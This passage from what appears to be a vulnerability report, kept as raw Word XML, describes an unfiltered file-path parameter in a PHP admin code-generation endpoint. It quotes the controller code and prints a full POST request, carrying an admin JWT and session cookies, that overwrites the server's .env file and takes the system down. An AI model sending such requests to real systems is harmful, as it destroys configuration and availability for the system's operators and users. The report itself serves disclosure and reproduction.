        <w:t xml:space="preserve">                    'option' =&gt; $option</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//搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (!empty($item['search'])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                $searchField[] = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'field' =&gt; $item['field'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'type' =&gt; $item['from_type'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'name' =&gt; $name,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'search' =&gt; $item['search'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'options' =&gt; $option</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//关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (!empty($item['hasOne'])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                $hasOneField[] = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'field' =&gt; $item['field'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'hasOne' =&gt; $item['hasOne'] ?? '',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'name' =&gt; $name,</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//索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (!empty($item['index'])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                $tableIndex[] = $item['field'];</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if (!$fromField) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            return app('json')-&gt;fail(500046);</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if (!$columnField) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            return app('json')-&gt;fail(500047);</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t xml:space="preserve">        $data['fromField'] = $fromField;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        $data['tableIndex'] = $tableIndex;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        $data['columnField'] = $columnField;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        $data['searchField'] = $searchField;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        $data['hasOneField'] = $hasOneField;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!$data['tableName']) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            return app('json')-&gt;fail(500042);</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$this-&gt;services-&gt;createCrud($id, $data);</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return app('json')-&gt;success(500043);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="ucdba477f"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkStart w:id="14" w:name="IDqcb"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Without any filtering of the path of the passed parameter, you can traverse the directory and overwrite the contents of the file directly. In the following example, you can directly overwrite the.env file of the system. This file is the configuration file of mysql redis. If the contents are overwritten or contaminated, the system will not be able to connect to the database properly and the system will crash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>Vulnerability recurrence</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="uef03c904"/>
      <w:bookmarkStart w:id="16" w:name="u70f8148f"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The original contents of the file are shown in the figure</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4775200" cy="4618990"/>
            <wp:effectExtent l="0" t="0" r="1016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775200" cy="4619231"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="u0175579c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Send the following packet to overwrite the.env file</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>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8" w:name="uNvao"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /adminapi/system/crud HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Host: 192.168.242.142:89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Content-Length: 892</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Accept: application/json, text/plain, */*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjc5NTcwNywibmJmIjoxNzA2Nzk1NzA3LCJleHAiOjE3MDkzODc3MDcsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.UXGhi5sYhA4tNyLX1CWza_qjJKkR8jMaKZ7CwdeBpUY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Content-Type: application/json;charset=UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Origin: http://192.168.242.142:89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Referer: http://192.168.242.142:89/admin/system/code_generation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cookie: cb_lang=zh-cn; PHPSESSID=3c31ae0511c0770e81da16eb38aa551a; WS_ADMIN_URL=ws://192.168.242.142:89/notice; WS_CHAT_URL=ws://192.168.242.142:89/msg; uuid=1; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjc5NTcwNywibmJmIjoxNzA2Nzk1NzA3LCJleHAiOjE3MDkzODc3MDcsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.UXGhi5sYhA4tNyLX1CWza_qjJKkR8jMaKZ7CwdeBpUY; expires_time=1709387707</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Connection: close</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pid":7,"tableName":"aa","modelName":"aa","isTable":1,"menuName":"aa","filePath":{"controller":".env","model":"app\\model\\crud\\Aa.php","dao":"app\\dao\\crud\\AaDao.php","route":"app\\adminapi\\route\\crud\\aa.php","service":"app\\services\\crud\\AaServices.php","validate":"app\\adminapi\\validate\\crud\\AaValidate.php","router":"router\\modules\\crud\\aa.js","api":"api\\crud\\aa.js","pages":"pages\\crud\\aa\\index.vue"},"tableField":[{"field":"id","field_type":"int","default":"","comment":"自增ID","required":false,"is_table":true,"table_name":"ID","limit":"15","primaryKey":1,"from_type":""},{"field":"aa","field_type":"varchar","default":"aa","default_type":"1","comment":"aa","required":true,"is_table":true,"table_name":"aa","limit":200,"primaryKey":0,"from_type":"dateTime","search":"=","dictionary_id":0,"hasOne":["agent_level","name"],"index":true}],"deleteField":[]}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="u8db3dcd9"/>
      <w:bookmarkStart w:id="20" w:name="u05c25879"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="27044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7857066" cy="3637791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="u0c06a533"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Check the env file again and find that the original contents have been overwritten</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="u216310e0"/>
      <w:bookmarkStart w:id="23" w:name="u2f64cb17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="4141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7230534" cy="5126070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="ud5462c5f"/>
      <w:bookmarkStart w:id="25" w:name="ub66f8d2f"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>When you attempt to use the system, the system becomes unavailable</w:t>
